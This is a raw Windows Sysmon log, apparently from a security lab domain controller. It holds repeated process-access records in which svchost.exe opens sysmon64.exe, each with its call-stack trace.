13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 